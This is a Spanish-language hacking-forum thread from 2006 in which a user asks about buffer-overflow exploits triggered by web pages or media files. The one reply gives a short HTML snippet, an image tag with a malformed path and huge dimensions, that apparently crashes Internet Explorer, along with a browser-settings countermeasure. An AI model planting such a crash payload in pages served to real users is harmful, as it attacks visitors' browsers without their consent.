elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Usando Git para manipular el directorio de trabajo, el índice y commits (segunda parte)


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking Ético
| | |-+  Bugs y Exploits
| | | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | | |-+  Buffer Overflow en una pagina web
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Buffer Overflow en una pagina web  (Leído 2,733 veces)
mordiskos

Desconectado Desconectado

Mensajes: 242



Ver Perfil
Buffer Overflow en una pagina web
« en: 8 Marzo 2006, 22:50 pm »

Me gustaria saber si existe algun exploit que provoque un buffer overflow, mediante la ejecucion de codigo PHP, HTML o javascript y que permita ejecutar codigo arbitrario en el sistema afectado.

Tambien me interesaria saber si existe algun fallo conocido que provoque un buffer overflow mediante la reproduccion de archivos MP4, MP3, JPEG, TIFF, WMA, PNG...

Salu2 y gracias.
En línea

ANELKAOS
Colaborador
***
Desconectado Desconectado

Mensajes: 3.105


#include<nda.h>


Ver Perfil WWW
Re: Buffer Overflow en una pagina web
« Respuesta #1 en: 9 Marzo 2006, 00:45 am »

Un desbordamiento sencillito para que pruebes con la configuración por defecto:

1. Crea un archivo html con este contenido
Código:
<HTML>
  <BODY>
    <IMG SRC="/ .ANELKAOS.jpg" width="9999999" height="9999999">
  </BODY>
</HTML>

2. Guarda mi avatar con el nombre ANELKAOS.jpg en la misma carpeta.

3. Abrelo con IE  :D

Contramedida rápida: Herramientas > Opciones de Inet > pestaña Seguridad > ajustar el nivel de seguridad de la zona Internet a Alta.

Respecto a los BoF...existir existen multitud, pero siempre dependen del navegador o reproductor que se use. Si no eres mas específico....no te puedo ayudar mas.
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Problema, return address buffer overflow (Cómo calcular la dirección del buffer?
Bugs y Exploits
Debci 6 5,430 Último mensaje 7 Abril 2014, 20:00 pm
por soez
Buffer overflow: las direcciones en las que se apila siempre cambian (flag suid)
Bugs y Exploits
Ethicalsk 3 1,843 Último mensaje 9 Octubre 2015, 18:34 pm
por Ethicalsk
Aplicaciones vulnerables a buffer overflow
Bugs y Exploits
giruzgz 3 2,593 Último mensaje 6 Junio 2017, 02:39 am
por sirdarckcat
Buffer Overflow
Bugs y Exploits
vivianfes 0 756 Último mensaje 23 Abril 2019, 23:58 pm
por vivianfes
Buffer Overflow en web
Bugs y Exploits
seus 3 1,815 Último mensaje 29 Enero 2020, 22:18 pm
por WHK
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines